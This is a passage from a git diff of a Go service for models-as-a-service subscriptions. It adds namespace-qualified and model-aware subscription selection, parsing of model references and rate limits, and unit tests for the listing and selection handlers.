+	lister := &mockLister{subscriptions: subscriptions}
+	router := setupTestRouter(lister)
+
+	tests := []struct {
+		name                  string
+		groups                []string
+		username              string
+		requestedSubscription string
+		requestedModel        string
+		expectedName          string
+		expectedError         string
+		description           string
+	}{
+		{
+			name:           "error when both subscriptions have the model",
+			groups:         []string{"premium-users"},
+			username:       "alice",
+			requestedModel: "models/llm",
+			expectedError:  "multiple_subscriptions",
+			description:    "User has access to both gold and platinum, and both have models/llm. Should require explicit selection.",
+		},
+		{
+			name:                  "explicit selection works when both have model",
+			groups:                []string{"premium-users"},
+			username:              "alice",
+			requestedSubscription: "gold",
+			requestedModel:        "models/llm",
+			expectedName:          "gold",
+			description:           "User explicitly selects gold when both subscriptions have the model. Should honor explicit selection.",
+		},
+		{
+			name:                  "explicit selection of higher priority subscription",
+			groups:                []string{"premium-users"},
+			username:              "alice",
+			requestedSubscription: "platinum",
+			requestedModel:        "models/llm",
+			expectedName:          "platinum",
+			description:           "User explicitly selects platinum (higher priority) when both subscriptions have the model. Should honor explicit selection.",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			runSelectSubscriptionTest(
+				t, router,
+				tt.groups, tt.username, tt.requestedSubscription, tt.requestedModel,
+				tt.expectedName, tt.expectedError, tt.description,
+			)
+		})
+	}
+}
+
+func setupListTestRouter(lister subscription.Lister, username string, groups []string) *gin.Engine {
+	gin.SetMode(gin.TestMode)
+	router := gin.New()
+
+	log := logger.New(false)
+	selector := subscription.NewSelector(log, lister)
+	handler := subscription.NewHandler(log, selector)
+
+	setUser := func(c *gin.Context) {
+		c.Set("user", &token.UserContext{
+			Username: username,
+			Groups:   groups,
+		})
+		c.Next()
+	}
+
+	router.GET("/v1/subscriptions", setUser, handler.ListSubscriptions)
+	router.GET("/v1/model/:model-id/subscriptions", setUser, handler.ListSubscriptionsForModel)
+	return router
+}
+
+func TestListSubscriptions_MultipleAccessible(t *testing.T) {
+	lister := &mockLister{subscriptions: []*unstructured.Unstructured{
+		createTestSubscriptionWithAnnotations("free-sub", []string{"free-users"}, []string{"model-a"}, map[string]string{
+			"openshift.io/display-name": "Free Tier",
+		}),
+		createTestSubscriptionWithAnnotations("premium-sub", []string{"premium-users"}, []string{"model-a", "model-b"}, map[string]string{
+			"openshift.io/display-name": "Premium Plan",
+			"openshift.io/description":  "High limits for production",
+		}),
+		createTestSubscriptionWithAnnotations("other-sub", []string{"other-group"}, []string{"model-a"}, nil),
+	}}
+
+	router := setupListTestRouter(lister, "alice", []string{"free-users", "premium-users"})
+	req := httptest.NewRequest(http.MethodGet, "/v1/subscriptions", nil)
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("expected status 200, got %d: %s", w.Code, w.Body.String())
+	}
+
+	var result []subscription.SubscriptionInfo
+	if err := json.Unmarshal(w.Body.Bytes(), &result); err != nil {
+		t.Fatalf("failed to unmarshal response: %v", err)
+	}
+
+	if len(result) != 2 {
+		t.Fatalf("expected 2 subscriptions, got %d", len(result))
+	}
+
+	found := map[string]string{}
+	for _, s := range result {
+		found[s.SubscriptionIDHeader] = s.SubscriptionDescription
+	}
+
+	if desc, ok := found["free-sub"]; !ok || desc != "Free Tier" {
+		t.Errorf("expected free-sub with description 'Free Tier' (fallback from display-name), got %q", desc)
+	}
+	if desc, ok := found["premium-sub"]; !ok || desc != "High limits for production" {
+		t.Errorf("expected premium-sub with description 'High limits for production', got %q", desc)
+	}
+}
+
+func TestListSubscriptions_NoAccess(t *testing.T) {
+	lister := &mockLister{subscriptions: []*unstructured.Unstructured{
+		createTestSubscriptionWithAnnotations("premium-sub", []string{"premium-users"}, []string{"model-a"}, nil),
+	}}
+
+	router := setupListTestRouter(lister, "nobody", []string{"unknown-group"})
+	req := httptest.NewRequest(http.MethodGet, "/v1/subscriptions", nil)
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("expected status 200, got %d", w.Code)
+	}
+
+	var result []subscription.SubscriptionInfo
+	if err := json.Unmarshal(w.Body.Bytes(), &result); err != nil {
+		t.Fatalf("failed to unmarshal response: %v", err)
+	}
+
+	if len(result) != 0 {
+		t.Errorf("expected empty array, got %d items", len(result))
+	}
+}
+
+func TestListSubscriptionsForModel_FiltersByModel(t *testing.T) {
+	lister := &mockLister{subscriptions: []*unstructured.Unstructured{
+		createTestSubscriptionWithAnnotations("free-sub", []string{"free-users"}, []string{"model-a"}, map[string]string{
+			"openshift.io/display-name": "Free Tier",
+		}),
+		createTestSubscriptionWithAnnotations("premium-sub", []string{"premium-users"}, []string{"model-a", "model-b"}, map[string]string{
+			"openshift.io/display-name": "Premium Plan",
+		}),
+	}}
+
+	router := setupListTestRouter(lister, "alice", []string{"free-users", "premium-users"})
+
+	// model-b is only in premium-sub
+	req := httptest.NewRequest(http.MethodGet, "/v1/model/model-b/subscriptions", nil)
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("expected status 200, got %d", w.Code)
+	}
+
+	var result []subscription.SubscriptionInfo
+	if err := json.Unmarshal(w.Body.Bytes(), &result); err != nil {
+		t.Fatalf("failed to unmarshal response: %v", err)
+	}
+
+	if len(result) != 1 {
+		t.Fatalf("expected 1 subscription for model-b, got %d", len(result))
+	}
+	if result[0].SubscriptionIDHeader != "premium-sub" {
+		t.Errorf("expected premium-sub, got %q", result[0].SubscriptionIDHeader)
+	}
+}
+
+func TestListSubscriptionsForModel_UnknownModel(t *testing.T) {
+	lister := &mockLister{subscriptions: []*unstructured.Unstructured{
+		createTestSubscriptionWithAnnotations("free-sub", []string{"free-users"}, []string{"model-a"}, nil),
+	}}
+
+	router := setupListTestRouter(lister, "alice", []string{"free-users"})
+
+	req := httptest.NewRequest(http.MethodGet, "/v1/model/nonexistent-model/subscriptions", nil)
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("expected status 200, got %d", w.Code)
+	}
+
+	var result []subscription.SubscriptionInfo
+	if err := json.Unmarshal(w.Body.Bytes(), &result); err != nil {
+		t.Fatalf("failed to unmarshal response: %v", err)
+	}
+
+	if len(result) != 0 {
+		t.Errorf("expected empty array for unknown model, got %d items", len(result))
+	}
+}
+
+func TestListSubscriptions_DescriptionFallback(t *testing.T) {
+	lister := &mockLister{subscriptions: []*unstructured.Unstructured{
+		createTestSubscriptionWithAnnotations("both-annotations", []string{"free-users"}, []string{"m"}, map[string]string{
+			"openshift.io/display-name": "My Display Name",
+			"openshift.io/description":  "My Description",
+		}),
+		createTestSubscriptionWithAnnotations("with-description-only", []string{"free-users"}, []string{"m"}, map[string]string{
+			"openshift.io/description": "Description Only",
+		}),
+		createTestSubscriptionWithAnnotations("with-display-name-only", []string{"free-users"}, []string{"m"}, map[string]string{
+			"openshift.io/display-name": "Display Name Only",
+		}),
+		createTestSubscriptionWithAnnotations("no-annotations", []string{"free-users"}, []string{"m"}, nil),
+	}}
+
+	router := setupListTestRouter(lister, "alice", []string{"free-users"})
+	req := httptest.NewRequest(http.MethodGet, "/v1/subscriptions", nil)
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("expected status 200, got %d", w.Code)
+	}
+
+	var result []subscription.SubscriptionInfo
+	if err := json.Unmarshal(w.Body.Bytes(), &result); err != nil {
+		t.Fatalf("failed to unmarshal response: %v", err)
+	}
+
+	if len(result) != 4 {
+		t.Fatalf("expected 4 subscriptions, got %d", len(result))
+	}
+
+	byID := map[string]subscription.SubscriptionInfo{}
+	for _, s := range result {
+		byID[s.SubscriptionIDHeader] = s
+	}
+
+	// Description preferred over display-name
+	if byID["both-annotations"].SubscriptionDescription != "My Description" {
+		t.Errorf("expected description 'My Description', got %q", byID["both-annotations"].SubscriptionDescription)
+	}
+	if byID["both-annotations"].DisplayName != "My Display Name" {
+		t.Errorf("expected display_name 'My Display Name', got %q", byID["both-annotations"].DisplayName)
+	}
+	// Description only
+	if byID["with-description-only"].SubscriptionDescription != "Description Only" {
+		t.Errorf("expected description 'Description Only', got %q", byID["with-description-only"].SubscriptionDescription)
+	}
+	// Display-name falls back to subscription_description when no description
+	if byID["with-display-name-only"].SubscriptionDescription != "Display Name Only" {
+		t.Errorf("expected description fallback to display-name, got %q", byID["with-display-name-only"].SubscriptionDescription)
+	}
+	if byID["with-display-name-only"].DisplayName != "Display Name Only" {
+		t.Errorf("expected display_name 'Display Name Only', got %q", byID["with-display-name-only"].DisplayName)
+	}
+	// No annotations: falls back to name
+	if byID["no-annotations"].SubscriptionDescription != "no-annotations" {
+		t.Errorf("expected name fallback, got %q", byID["no-annotations"].SubscriptionDescription)
+	}
+}
+
+func TestListSubscriptionsForModel_NoAccess(t *testing.T) {
+	lister := &mockLister{subscriptions: []*unstructured.Unstructured{
+		createTestSubscriptionWithAnnotations("premium-sub", []string{"premium-users"}, []string{"model-a"}, nil),
+	}}
+
+	router := setupListTestRouter(lister, "nobody", []string{"unknown-group"})
+	req := httptest.NewRequest(http.MethodGet, "/v1/model/model-a/subscriptions", nil)
+	w := httptest.NewRecorder()
+	router.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("expected status 200, got %d", w.Code)
+	}
+
+	var result []subscription.SubscriptionInfo
+	if err := json.Unmarshal(w.Body.Bytes(), &result); err != nil {
+		t.Fatalf("failed to unmarshal response: %v", err)
+	}
+
+	if len(result) != 0 {
+		t.Errorf("expected empty array when user has no access, got %d items", len(result))
+	}
+}
diff --git a/maas-api/internal/subscription/selector.go b/maas-api/internal/subscription/selector.go
index a0b469116..ea71e3c89 100644
--- a/maas-api/internal/subscription/selector.go
+++ b/maas-api/internal/subscription/selector.go
@@ -9,6 +9,7 @@ import (
 
 	"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
 
+	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/constant"
 	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/logger"
 )
 
@@ -37,6 +38,9 @@ func NewSelector(log *logger.Logger, lister Lister) *Selector {
 // subscription represents a parsed MaaSSubscription for selection.
 type subscription struct {
 	Name           string
+	Namespace      string
+	DisplayName    string
+	Description    string
 	Groups         []string
 	Users          []string
 	Priority       int32
@@ -44,11 +48,39 @@ type subscription struct {
 	OrganizationID string
 	CostCenter     string
 	Labels         map[string]string
+	ModelRefs      []ModelRefInfo
+}
+
+// GetAllAccessible returns all subscriptions the user has access to.
+func (s *Selector) GetAllAccessible(groups []string, username string) ([]*SelectResponse, error) {
+	if len(groups) == 0 && username == "" {
+		return nil, errors.New("either groups or username must be provided")
+	}
+
+	subscriptions, err := s.loadSubscriptions()
+	if err != nil {
+		return nil, fmt.Errorf("failed to load subscriptions: %w", err)
+	}
+
+	var accessible []*SelectResponse
+	for _, sub := range subscriptions {
+		if userHasAccess(&sub, username, groups) {
+			accessible = append(accessible, toResponse(&sub))
+		}
+	}
+
+	// Sort for deterministic ordering
+	sort.Slice(accessible, func(i, j int) bool {
+		return accessible[i].Name < accessible[j].Name
+	})
+
+	return accessible, nil
 }
 
 // Select implements the subscription selection logic.
 // Returns the selected subscription or an error if none found.
-func (s *Selector) Select(groups []string, username string, requestedSubscription string) (*SelectResponse, error) {
+// If requestedModel is provided, validates that the selected subscription includes that model.
+func (s *Selector) Select(groups []string, username string, requestedSubscription string, requestedModel string) (*SelectResponse, error) {
 	if len(groups) == 0 && username == "" {
 		return nil, errors.New("either groups or username must be provided")
 	}
@@ -66,22 +98,51 @@ func (s *Selector) Select(groups []string, username string, requestedSubscriptio
 	sortSubscriptionsByPriority(subscriptions)
 
 	// Branch 1: Explicit subscription selection (with validation)
+	// Support both formats: "namespace/name" and bare "name"
 	if requestedSubscription != "" {
+		// First, try exact qualified match (namespace/name)
 		for _, sub := range subscriptions {
-			if sub.Name == requestedSubscription {
-				if userHasAccess(&sub, username, groups) {
-					return toResponse(&sub), nil
+			qualifiedName := fmt.Sprintf("%s/%s", sub.Namespace, sub.Name)
+			if qualifiedName == requestedSubscription {
+				if !userHasAccess(&sub, username, groups) {
+					return nil, &AccessDeniedError{Subscription: requestedSubscription}
+				}
+				// Validate subscription includes the requested model
+				if requestedModel != "" && !subscriptionIncludesModel(&sub, requestedModel) {
+					return nil, &ModelNotInSubscriptionError{Subscription: requestedSubscription, Model: requestedModel}
 				}
-				return nil, &AccessDeniedError{Subscription: requestedSubscription}
+				return toResponse(&sub), nil
 			}
 		}
+
+		// If no qualified match found and request is bare name (no '/'), try bare name matching
+		if !strings.Contains(requestedSubscription, "/") {
+			for _, sub := range subscriptions {
+				if sub.Name != requestedSubscription {
+					continue
+				}
+				if !userHasAccess(&sub, username, groups) {
+					return nil, &AccessDeniedError{Subscription: requestedSubscription}
+				}
+				if requestedModel != "" && !subscriptionIncludesModel(&sub, requestedModel) {
+					return nil, &ModelNotInSubscriptionError{Subscription: requestedSubscription, Model: requestedModel}
+				}
+				return toResponse(&sub), nil
+			}
+		}
+
+		// Request had '/' but no match found
 		return nil, &SubscriptionNotFoundError{Subscription: requestedSubscription}
 	}
 
-	// Branch 2: Auto-selection (only if user has exactly one subscription)
+	// Branch 2: Auto-selection
 	var accessibleSubs []subscription
 	for _, sub := range subscriptions {
 		if userHasAccess(&sub, username, groups) {
+			// If model is specified, only include subscriptions that contain that model
+			if requestedModel != "" && !subscriptionIncludesModel(&sub, requestedModel) {
+				continue
+			}
 			accessibleSubs = append(accessibleSubs, sub)
 		}
 	}
@@ -102,6 +163,37 @@ func (s *Selector) Select(groups []string, username string, requestedSubscriptio
 	return nil, &MultipleSubscriptionsError{Subscriptions: subNames}
 }
 
+// SelectHighestPriority returns the accessible subscription with highest spec.priority
+// (then max token limit desc, then name asc for deterministic ties).
+func (s *Selector) SelectHighestPriority(groups []string, username string) (*SelectResponse, error) {
+	if len(groups) == 0 && username == "" {
+		return nil, errors.New("either groups or username must be provided")
+	}
+
+	subscriptions, err := s.loadSubscriptions()
+	if err != nil {
+		return nil, fmt.Errorf("failed to load subscriptions: %w", err)
+	}
+
+	if len(subscriptions) == 0 {
+		return nil, &NoSubscriptionError{}
+	}
+
+	var accessible []subscription
+	for _, sub := range subscriptions {
+		if userHasAccess(&sub, username, groups) {
+			accessible = append(accessible, sub)
+		}
+	}
+
+	if len(accessible) == 0 {
+		return nil, &NoSubscriptionError{}
+	}
+
+	sortSubscriptionsByPriority(accessible)
+	return toResponse(&accessible[0]), nil
+}
+
 // loadSubscriptions fetches and parses MaaSSubscription resources.
 func (s *Selector) loadSubscriptions() ([]subscription, error) {
 	objects, err := s.lister.List()
@@ -134,7 +226,14 @@ func parseSubscription(obj *unstructured.Unstructured) (subscription, error) {
 	}
 
 	sub := subscription{
-		Name: obj.GetName(),
+		Name:      obj.GetName(),
+		Namespace: obj.GetNamespace(),
+	}
+
+	// Parse annotations for display metadata
+	if annotations := obj.GetAnnotations(); annotations != nil {
+		sub.DisplayName = annotations[constant.AnnotationDisplayName]
+		sub.Description = annotations[constant.AnnotationDescription]
 	}
 
 	// Parse owner
@@ -163,44 +262,80 @@ func parseSubscription(obj *unstructured.Unstructured) (subscription, error) {
 		}
 	}
 
-	// Parse modelRefs to calculate maxLimit
+	// Parse modelRefs
 	if modelRefs, found, _ := unstructured.NestedSlice(spec, "modelRefs"); found {
 		for _, modelRef := range modelRefs {
 			if modelMap, ok := modelRef.(map[string]any); ok {
-				if limits, found, _ := unstructured.NestedSlice(modelMap, "tokenRateLimits"); found {
-					for _, limitRaw := range limits {
-						if limitMap, ok := limitRaw.(map[string]any); ok {
-							if limit, ok := limitMap["limit"].(int64); ok {
-								if limit > sub.MaxLimit {
-									sub.MaxLimit = limit
-								}
-							}
-						}
+				ref := parseModelRef(modelMap)
+				for _, trl := range ref.TokenRateLimits {
+					if trl.Limit > sub.MaxLimit {
+						sub.MaxLimit = trl.Limit
 					}
 				}
+				sub.ModelRefs = append(sub.ModelRefs, ref)
 			}
 		}
 	}
 
 	// Parse tokenMetadata
-	if metadata, found, _ := unstructured.NestedMap(spec, "tokenMetadata"); found {
-		if orgID, ok := metadata["organizationId"].(string); ok {
-			sub.OrganizationID = orgID
-		}
-		if costCenter, ok := metadata["costCenter"].(string); ok {
-			sub.CostCenter = costCenter
-		}
-		if labelsRaw, ok := metadata["labels"].(map[string]any); ok {
-			sub.Labels = make(map[string]string)
-			for k, v := range labelsRaw {
-				if s, ok := v.(string); ok {
-					sub.Labels[k] = s
+	parseTokenMetadata(spec, &sub)
+
+	return sub, nil
+}
+
+// parseModelRef extracts a ModelRefInfo from an unstructured model ref map.
+func parseModelRef(modelMap map[string]any) ModelRefInfo {
+	ref := ModelRefInfo{}
+	if name, ok := modelMap["name"].(string); ok {
+		ref.Name = name
+	}
+	if ns, ok := modelMap["namespace"].(string); ok {
+		ref.Namespace = ns
+	}
+	if limits, found, _ := unstructured.NestedSlice(modelMap, "tokenRateLimits"); found {
+		for _, limitRaw := range limits {
+			if limitMap, ok := limitRaw.(map[string]any); ok {
+				trl := TokenRateLimit{}
+				if limit, ok := limitMap["limit"].(int64); ok {
+					trl.Limit = limit
+				}
+				if window, ok := limitMap["window"].(string); ok {
+					trl.Window = window
 				}
+				ref.TokenRateLimits = append(ref.TokenRateLimits, trl)
 			}
 		}
 	}
+	if billingRate, found, _ := unstructured.NestedMap(modelMap, "billingRate"); found {
+		br := &BillingRate{}
+		if perToken, ok := billingRate["perToken"].(string); ok {
+			br.PerToken = perToken
+		}
+		ref.BillingRate = br
+	}
+	return ref
+}
 
-	return sub, nil
+// parseTokenMetadata extracts tokenMetadata fields from the spec into the subscription.
+func parseTokenMetadata(spec map[string]any, sub *subscription) {
+	metadata, found, _ := unstructured.NestedMap(spec, "tokenMetadata")
+	if !found {
+		return
+	}
+	if orgID, ok := metadata["organizationId"].(string); ok {
+		sub.OrganizationID = orgID
+	}
+	if costCenter, ok := metadata["costCenter"].(string); ok {
+		sub.CostCenter = costCenter
+	}
+	if labelsRaw, ok := metadata["labels"].(map[string]any); ok {
+		sub.Labels = make(map[string]string)
+		for k, v := range labelsRaw {
+			if s, ok := v.(string); ok {
+				sub.Labels[k] = s
+			}
+		}
+	}
 }
 
 // userHasAccess checks if user/groups match subscription owner.
@@ -223,20 +358,140 @@ func userHasAccess(sub *subscription, username string, groups []string) bool {
 	return false
 }
 
-// sortSubscriptionsByPriority sorts in-place by priority desc, then maxLimit desc.
+// subscriptionIncludesModel checks if the subscription's modelRefs includes the requested model.
+// requestedModel format: "namespace/name".
+func subscriptionIncludesModel(sub *subscription, requestedModel string) bool {
+	if requestedModel == "" {
+		return true // no model specified, so subscription is valid
+	}
+
+	// Parse the requested model (format: "namespace/name")
+	parts := strings.SplitN(requestedModel, "/", 2)
+	if len(parts) != 2 {
+		return false // invalid format
+	}
+	requestedNS := parts[0]
+	requestedName := parts[1]
+
+	// Check if any modelRef in the subscription matches
+	for _, ref := range sub.ModelRefs {
+		if ref.Namespace == requestedNS && ref.Name == requestedName {
+			return true
+		}
+	}
+
+	return false
+}
+
+// hasModel returns true if the subscription includes the given model name.
+func (s subscription) hasModel(modelID string) bool {
+	for _, ref := range s.ModelRefs {
+		if ref.Name == modelID {
+			return true
+		}
+	}
+	return false
+}
+
+// sortSubscriptionsByPriority sorts in-place by priority desc, then maxLimit desc, then name asc.
 func sortSubscriptionsByPriority(subs []subscription) {
 	sort.SliceStable(subs, func(i, j int) bool {
 		if subs[i].Priority != subs[j].Priority {
 			return subs[i].Priority > subs[j].Priority
 		}
-		return subs[i].MaxLimit > subs[j].MaxLimit
+		if subs[i].MaxLimit != subs[j].MaxLimit {
+			return subs[i].MaxLimit > subs[j].MaxLimit
+		}
+		return subs[i].Name < subs[j].Name
 	})
 }
 
+// ListAccessibleForModel returns subscriptions the user has access to
+// that include the specified model in their modelRefs.
+func (s *Selector) ListAccessibleForModel(username string, groups []string, modelID string) ([]SubscriptionInfo, error) {
+	subscriptions, err := s.loadSubscriptions()
+	if err != nil {
+		return nil, fmt.Errorf("failed to load subscriptions: %w", err)
+	}
+
+	result := []SubscriptionInfo{}
+	for _, sub := range subscriptions {
+		if userHasAccess(&sub, username, groups) && sub.hasModel(modelID) {
+			result = append(result, toSubscriptionInfo(&sub))
+		}
+	}
+
+	// Sort for deterministic ordering
+	sort.Slice(result, func(i, j int) bool {
+		return result[i].SubscriptionIDHeader < result[j].SubscriptionIDHeader
+	})
+
+	return result, nil
+}
+
+// toSubscriptionInfo converts internal subscription to a list response item.
+func toSubscriptionInfo(sub *subscription) SubscriptionInfo {
+	desc := sub.Description
+	if desc == "" {
+		desc = sub.DisplayName
+	}
+	if desc == "" {
+		desc = sub.Name
+	}
+	modelRefs := sub.ModelRefs
+	if modelRefs == nil {
+		modelRefs = []ModelRefInfo{}
+	}
+	return SubscriptionInfo{
+		SubscriptionIDHeader:    sub.Name,
+		SubscriptionDescription: desc,
+		DisplayName:             sub.DisplayName,
+		Priority:                sub.Priority,
+		ModelRefs:               modelRefs,
+		OrganizationID:          sub.OrganizationID,
+		CostCenter:              sub.CostCenter,
+		Labels:                  sub.Labels,
+	}
+}
+
+// ResponseToSubscriptionInfo converts a SelectResponse to a SubscriptionInfo.
+func ResponseToSubscriptionInfo(sub *SelectResponse) SubscriptionInfo {
+	desc := sub.Description
+	if desc == "" {
+		desc = sub.DisplayName
+	}
+	if desc == "" {
+		desc = sub.Name
+	}
+	modelRefs := sub.ModelRefs
+	if modelRefs == nil {
+		modelRefs = []ModelRefInfo{}
+	}
+	return SubscriptionInfo{
+		SubscriptionIDHeader:    sub.Name,
+		SubscriptionDescription: desc,
+		DisplayName:             sub.DisplayName,
+		Priority:                sub.Priority,
+		ModelRefs:               modelRefs,
+		OrganizationID:          sub.OrganizationID,
+		CostCenter:              sub.CostCenter,
+		Labels:                  sub.Labels,
+	}
+}
+
 // toResponse converts internal subscription to API response.
 func toResponse(sub *subscription) *SelectResponse {
+	modelRefs := sub.ModelRefs
+	if modelRefs == nil {
+		modelRefs = []ModelRefInfo{}
+	}
 	return &SelectResponse{
 		Name:           sub.Name,
+		Namespace:      sub.Namespace,
+		DisplayName:    sub.DisplayName,
+		Description:    sub.Description,
+		Priority:       sub.Priority,
+		ModelRefs:      modelRefs,
 		OrganizationID: sub.OrganizationID,
 		CostCenter:     sub.CostCenter,
 		Labels:         sub.Labels,
@@ -276,3 +531,13 @@ type MultipleSubscriptionsError struct {
 func (e *MultipleSubscriptionsError) Error() string {
 	return "user has access to multiple subscriptions, must specify subscription using X-MaaS-Subscription header"
 }
+
+// ModelNotInSubscriptionError indicates the requested model is not included in the subscription.
+type ModelNotInSubscriptionError struct {
+	Subscription string
+	Model        string
+}
+
+func (e *ModelNotInSubscriptionError) Error() string {
+	return fmt.Sprintf("subscription %s does not include model %s", e.Subscription, e.Model)
+}
diff --git a/maas-api/internal/subscription/selector_test.go b/maas-api/internal/subscription/selector_test.go
new file mode 100644
index 000000000..b78fd0cbc
--- /dev/null
+++ b/maas-api/internal/subscription/selector_test.go
@@ -0,0 +1,335 @@
+package subscription_test
+
+import (
+	"errors"
+	"testing"
+
+	"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
+
+	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/logger"
+	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/subscription"
+)
+
+const defaultTestTokenRateLimit int64 = 1000
+
+// fakeLister implements subscription.Lister for testing.
+type fakeLister struct {
+	subscriptions []*unstructured.Unstructured
+	err           error
+}
+
+func (f *fakeLister) List() ([]*unstructured.Unstructured, error) {
+	if f.err != nil {
+		return nil, f.err
+	}
+	return f.subscriptions, nil
+}
+
+func createSubscription(name string, groups []string, users []string, priority int32, tokenLimit int64, displayName, description string) *unstructured.Unstructured {
+	groupsSlice := make([]any, len(groups))
+	for i, g := range groups {
+		groupsSlice[i] = map[string]any{"name": g}
+	}
+
+	usersSlice := make([]any, len(users))
+	for i, u := range users {
+		usersSlice[i] = u
+	}
+
+	spec := map[string]any{
+		"owner": map[string]any{
+			"groups": groupsSlice,
+			"users":  usersSlice,
+		},
+		"priority": int64(priority),
+		"modelRefs": []any{
+			map[string]any{
+				"name": "test-model",
+				"tokenRateLimits": []any{
+					map[string]any{
+						"limit":  tokenLimit,
+						"window": "1m",
+					},
+				},
+			},
+		},
+	}
+
+	metadata := map[string]any{
+		"name":      name,
+		"namespace": "test-ns",
+	}
+
+	// Add optional displayName and description as annotations
+	if displayName != "" || description != "" {
+		annotations := map[string]any{}
+		if displayName != "" {
+			annotations["openshift.io/display-name"] = displayName
+		}
+		if description != "" {
+			annotations["openshift.io/description"] = description
+		}
+		metadata["annotations"] = annotations
+	}
+
+	return &unstructured.Unstructured{
+		Object: map[string]any{
+			"apiVersion": "maas.opendatahub.io/v1alpha1",
+			"kind":       "MaaSSubscription",
+			"metadata":   metadata,
+			"spec":       spec,
+		},
+	}
+}
+
+func TestGetAllAccessible(t *testing.T) {
+	log := logger.New(false)
+
+	tests := []struct {
+		name                 string
+		subscriptions        []*unstructured.Unstructured
+		groups               []string
+		username             string
+		expectedCount        int
+		expectedNames        []string
+		expectedDisplayNames map[string]string // map[name]displayName
+		expectedDescriptions map[string]string // map[name]description
+		expectError          bool
+	}{
+		{
+			name: "user has access to single subscription",
+			subscriptions: []*unstructured.Unstructured{
+				createSubscription("basic-sub", []string{"basic-users"}, nil, 10, defaultTestTokenRateLimit, "Basic Tier", "Basic subscription for all users"),
+			},
+			groups:        []string{"basic-users"},
+			username:      "alice",
+			expectedCount: 1,
+			expectedNames: []string{"basic-sub"},
+			expectedDisplayNames: map[string]string{
+				"basic-sub": "Basic Tier",
+			},
+			expectedDescriptions: map[string]string{
+				"basic-sub": "Basic subscription for all users",
+			},
+		},
+		{
+			name: "user has access to multiple subscriptions",
+			subscriptions: []*unstructured.Unstructured{
+				createSubscription("basic-sub", []string{"basic-users"}, nil, 10, defaultTestTokenRateLimit, "Basic Tier", "Basic subscription"),
+				createSubscription("premium-sub", []string{"premium-users"}, nil, 20, defaultTestTokenRateLimit, "Premium Tier", "Premium subscription"),
+			},
+			groups:        []string{"basic-users", "premium-users"},
+			username:      "alice",
+			expectedCount: 2,
+			expectedNames: []string{"basic-sub", "premium-sub"},
+			expectedDisplayNames: map[string]string{
+				"basic-sub":   "Basic Tier",
+				"premium-sub": "Premium Tier",
+			},
+			expectedDescriptions: map[string]string{
+				"basic-sub":   "Basic subscription",
+				"premium-sub": "Premium subscription",
+			},
+		},
+		{
+			name: "user has no subscriptions",
+			subscriptions: []*unstructured.Unstructured{
+				createSubscription("basic-sub", []string{"basic-users"}, nil, 10, defaultTestTokenRateLimit, "", ""),
+			},
+			groups:        []string{"other-users"},
+			username:      "alice",
+			expectedCount: 0,
+			expectedNames: []string{},
+		},
+		{
+			name:          "no subscriptions exist",
+			subscriptions: []*unstructured.Unstructured{},
+			groups:        []string{"any-group"},
+			username:      "alice",
+			expectedCount: 0,
+			expectedNames: []string{},
+		},
+		{
+			name: "user matched by username",
+			subscriptions: []*unstructured.Unstructured{
+				createSubscription("alice-sub", []string{}, []string{"alice"}, 10, defaultTestTokenRateLimit, "Alice's Subscription", "Personal subscription for Alice"),
+			},
+			groups:        []string{},
+			username:      "alice",
+			expectedCount: 1,
+			expectedNames: []string{"alice-sub"},
+			expectedDisplayNames: map[string]string{
+				"alice-sub": "Alice's Subscription",
+			},
+			expectedDescriptions: map[string]string{
+				"alice-sub": "Personal subscription for Alice",
+			},
+		},
+		{
+			name: "subscriptions without displayName and description",
+			subscriptions: []*unstructured.Unstructured{
+				createSubscription("basic-sub", []string{"basic-users"}, nil, 10, defaultTestTokenRateLimit, "", ""),
+			},
+			groups:        []string{"basic-users"},
+			username:      "alice",
+			expectedCount: 1,
+			expectedNames: []string{"basic-sub"},
+			expectedDisplayNames: map[string]string{
+				"basic-sub": "", // Should be empty
+			},
+			expectedDescriptions: map[string]string{
+				"basic-sub": "", // Should be empty
+			},
+		},
+		{
+			name: "filter out subscriptions user doesn't have access to",
+			subscriptions: []*unstructured.Unstructured{
+				createSubscription("basic-sub", []string{"basic-users"}, nil, 10, defaultTestTokenRateLimit, "", ""),
+				createSubscription("premium-sub", []string{"premium-users"}, nil, 20, defaultTestTokenRateLimit, "", ""),
+				createSubscription("admin-sub", []string{"admin-users"}, nil, 30, defaultTestTokenRateLimit, "", ""),
+			},
+			groups:        []string{"basic-users"},
+			username:      "alice",
+			expectedCount: 1,
+			expectedNames: []string{"basic-sub"},
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			lister := &fakeLister{subscriptions: tt.subscriptions}
+			selector := subscription.NewSelector(log, lister)
+
+			result, err := selector.GetAllAccessible(tt.groups, tt.username)
+
+			if tt.expectError {
+				if err == nil {
+					t.Errorf("expected error, got nil")
+				}
+				return
+			}
+
+			if err != nil {
+				t.Errorf("unexpected error: %v", err)
+				return
+			}
+
+			if len(result) != tt.expectedCount {
+				t.Errorf("expected %d subscriptions, got %d", tt.expectedCount, len(result))
+				return
+			}
+
+			// Verify subscription names
+			gotNames := make(map[string]bool)
+			for _, sub := range result {
+				gotNames[sub.Name] = true
+			}
+
+			for _, expectedName := range tt.expectedNames {
+				if !gotNames[expectedName] {
+					t.Errorf("expected subscription %q not found in results", expectedName)
+				}
+			}
+
+			// Verify displayNames and descriptions if provided
+			if tt.expectedDisplayNames != nil {
+				for _, sub := range result {
+					expectedDisplayName := tt.expectedDisplayNames[sub.Name]
+					if sub.DisplayName != expectedDisplayName {
